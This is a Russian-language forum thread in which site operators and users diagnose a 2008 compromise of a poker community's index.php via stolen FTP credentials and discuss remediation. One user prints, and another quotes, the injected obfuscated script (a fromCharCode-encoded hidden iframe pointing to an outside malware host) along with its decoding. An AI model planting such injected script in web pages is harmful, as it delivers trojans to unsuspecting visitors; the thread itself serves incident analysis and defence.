[Galina Galanova]

Очень странно, у меня антивирус - avast и doktor Web, ничего не находят, я часто хожу на этот сайт, проверялась 30 минут назад.. :? , специально заходила,все чисто!

[Zedmor]

Люди, а вы не могли бы спросить службу поддержки антивируса, который выдает это дело (это ведь касперский, так?) на тему того, почему это происходит?

Я выложил тут ответ на GET запрос, скрипты со страницы. Хотелось бы понять, почему срабатывает антивирус. На главке точно нет никакого юзерского контента и все, что выдает сервер доступно любому, хочется понять на что срабатывает антивирус и не сделал ли кто фишинг мирор сайта, например, заспуфил днсы и давай народ туда заводить, тогда это надо бы пресечь.

Такого линка нигде нет на странице, можете сами проверить, так что если антивирус продолжает срабатывать скажите мне точную версию и название, мы сами тут будем тестить.

[droopy]

На главной странице (дальше не проверял), внедрен вредоносный код

Код:

<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,104,111,119,116,111,111,116,104,46,99,111,109,47,104,101,108,112,47,99,115,115,47,100,111,99,47,114,117,49,116,114,46,103,105,102,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62))</script>

После расшифровки имеем:

Код:

<iframe src="http://howtooth.com/help/css/doc/ru1tr.gif" style="display:none"></iframe>

картинка ru1tr.gif по сути является скриптом, который и перанаправляет юзера на сайт web-money.cn
2Zedmor: читал у тебя на сайте, что вашей команде требовались грамотные админы/программисты, писал тебе в аську, но ответа не получил
хотел предложить свои услуги.

[Zedmor]

Цитата:

Сообщение от DROOPY писал вс, 24 февраля 2008 00:47

писал тебе в аську, но ответа не получил
хотел предложить свои услуги.

Теперь получишь 100% пиши сейчас плиз.

p.s. В итоге выяснилось, что изначальное сообщение отфильровалось антиспамом из-за урла в сообщении ;((

[Galina Galanova]

Цитата:

Сообщение от DROOPY писал вс, 24 февраля 2008 00:47

На главной странице (дальше не проверял), внедрен вредоносный код

Код:

<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,104,111,119,116,111,111,116,104,46,99,111,109,47,104,101,108,112,47,99,115,115,47,100,111,99,47,114,117,49,116,114,46,103,105,102,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62))</script>

После расшифровки имеем:

Код:

<iframe src="http://howtooth.com/help/css/doc/ru1tr.gif" style="display:none"></iframe>

картинка ru1tr.gif по сути является скриптом, который и перанаправляет юзера на сайт web-money.cn
2Zedmor: читал у тебя на сайте, что вашей команде требовались грамотные админы/программисты, писал тебе в аську, но ответа не получил
хотел предложить свои услуги.

Это конечно "нормально", предложить услуги ...
А что мне скажешь? У меня вирус не определяется! :?

[Zedmor]

Хрень эту мы уберем с сайта, Друпи, если он согласится, наймем админом по безопасности.
Пока ясно, что кто-то получил доступ или к ftp или к руту и дописал в index.php в конец одной из строчек бяку, причем так, что при просмотре/редактировании ее не видно было, пароли поменяем и будем искать пути как смогли получить доступ к серверу.

[Zedmor]

В результате проведенного исследования, выяснилось, что злоумышленники получили доступ к ftp и поменяли содержимое файла index.php в корне, добавив вредоносный код. К сожалению, точных сведений относительно того, как они получили пароль к фтп нет, скорее всего сканированием трафика в сети, затроянив один из компьютеров в сетке, где стоит сервер.

Так как мы точно не знаем, что еще могли сделать злоумышленники мы просим всех игроков на мирпокера поменять палоли к сайту. Мы напишем скриптик завтра, который каждого юзера попросит поменять пароли в обязательном порядке.

Мы очень сожалеем о случившемся и хотим сообщить, что:

1. Мы попросили DROOPY работать с нами и он будет заниматься безопасностью сайта.2
2. Мы проведем полную ревизию сайта, скриптов на сайте и других наших сайтов на предмет сетевой безопасности.
3. Мы будем использовать вместо небезопасного FTP в котором пароль передается в открытом виде, безопасный sFTP.

Мы будем держать в курсе всех, относительно развития событий. Есть еще кое-какие вещи, которые я не хочу пока озвучивать, но позже обязательно сообщу. Это не касается безопасности сервера в данный момент и в будущем.

[DemoN]

Ну блииин, а че теперь делать то? У меня нод32+Аутпост стоит, заходил неоднократно - было тихо.

[Zedmor]

Цитата:

Сообщение от DemoN писал вс, 24 февраля 2008 03:49

Ну блииин, а че теперь делать то? У меня нод32+Аутпост стоит, заходил неоднократно - было тихо.

Вредоносный код внедрили 19го числа в 17 часов. Также неизвестно работал ли сайт, на который вела ссылка и реально ли выдавался ли где-то троян.

Еще хочу сказать спасибо форумчанам за оперативное сообщение по этому поводу.

Да, если кто захочет поучаствовать в расследовании причин - велкам. Обсудим это дело.

[droopy]

Всем, у кого не определился этот троян, советую отправить приведенный мной код разработчикам вашего антивируса (обычно есть такая возможность на их сайте), я сейчас это сделаю для DrWEB, обновление обычно выходит в течение нескольких часов.
ЗЫ: зловредный код с сайта я удалил.

[DruidMoo]

Лучше расскажите тем, у кого антивирус троян не выявил - признаки, по которым его можно "вручную" найти ...
У меня NAV360 и KAV его не видят. Может его и нет, но ..

[ProzAk-R]

У меня сейчас оооочень активная переписка с Лаб Касперского - в том чилсе отправил туда и этот код. Жду ответа .

[droopy]

цепочка работы трояна была такая
mirpokera->[Зарегистрироваться?]>[Зарегистрироваться?]
в конце цепочки сейчас кроме смайлика ^_~ ничего нет
правда есть вероятность, что скрипт проверяет параметры заголовка http запроса и кому попало трояна не пихает, а только если находит тип браузера необходимой версии.
А тем у кого не определился могу только сказать, что уже много раз видел подобную схему: <script>document.write(String.fromCharCode(чис� �а))</script > с редиректом через промежуточный сайт, так что ищите в коде страницы подстроку ".fromCharCode"

[ProzAk-R]

у меня его (сообщения) не было, да. На сайт заходил несколько раз и до темы, и после. В Общих вопросах есть тема про новую книгу - DROOPY, посмотри . Вот там мой антивирус кричал как ошпаренный. Я о сайте по ссылке.

[droopy]

Да и там троян, но другой и внедрен очень тупо в начало страницы, а не в середину, как на mirpokera
он у меня образался модулем удаления рекламы outpost
[Зарегистрироваться?]
но механизм шифровки очень продвинутый, такие шифровщики обычно пишутся на заказ и продаются
ЗЫ: не кликайте на ссылки, которые я приводил... сейчас исправлю
написал abuse request на этот домен, владельцы пока скрыты

Цитата:

Сообщение от Цитата:

Email Sent

We have received your complaint and have forwarded the same to our Abuse Department.

If this domain name is determined to be involved in the specified illegal activity, we would disable Privacy Protection Service for this domain name and take appropriate action against this domain name.

[InFlammable]

DROOPY, подскажи плз, у меня НОД молчал при заходе на мирпокера, но я недавно стал юзать плагин NoScript в Firefox, который по умолчанию блокирует все скрипты любого сайта, пока вручную не разрешишь. Этот плагин спасает от подобных проблем?

[droopy]

Цитата:

Сообщение от InFlammable писал вс, 24 февраля 2008 11:03

DROOPY, подскажи плз, у меня НОД молчал при заходе на мирпокера, но я недавно стал юзать плагин NoScript в Firefox, который по умолчанию блокирует все скрипты любого сайта, пока вручную не разрешишь. Этот плагин спасает от подобных проблем?

В данных конкретных случаях плагин бы помог, но есть возможность впаривать троянов и без javascript, так что не панацея.
Ну и в настоящее время многие сайты с отключенным javascript будут просто неработоспособны, что конечно не делает чести их создателям.
ЗЫ: возможно не все внимательно прочитали, хоть это только моё предположение, что троян пытается активироваться только при открытии зараженного сайта определенной (уязвимой) версией браузера, обычно при запросе страницы браузер сообщает серверу свою версию. Возможно по этому у многих антивирус и не реагировал... А может это просто мои фантазии, хотя это легко реализуемо.

[DickTracy]

Цитата:

Сообщение от bigwetbutts писал вс, 24 февраля 2008 00:12

Точно помню что троян дал о себе знать именно на вашем сайте.

Все точно также. Ко мне пролез троян. Понял я это по появившимся сообщениям о сертификации сайта *.wmtransfer.com при заходе на любой сайт. Первый раз оно появилось именно на мирепокера.
Вроде удалил антируткитом.

[Prolim]

2Droopy

Добрый день. У меня вопрос по поводу трояна.
У меня на компе есть постоянный антивирус авира, работающий всегда и запрещающий опасные процессы. Так же есть ещё два антивируса, которыми я периодически проверяю систему. На мирпокера я бывал почти каждый день, вчера после прочтения здесь темы целый день сканил комп всеми антивирусами, но все промолчали. Так вопрос у меня такой: возможно ли, что если будет известно имя зараженного файла, то его можно будет найти через полный поиск по системе и потом удалить вручную (а имя нам могут сообщить у кого антивирус его опознал), или это не подействует?

Заранее спасибо

[Yury]

У меня вчера при заходе на мирпокера KIS обнаружил:
обнаружено: троянская программа Trojan-Downloader.JS.Agent.abs URL: [Зарегистрироваться?]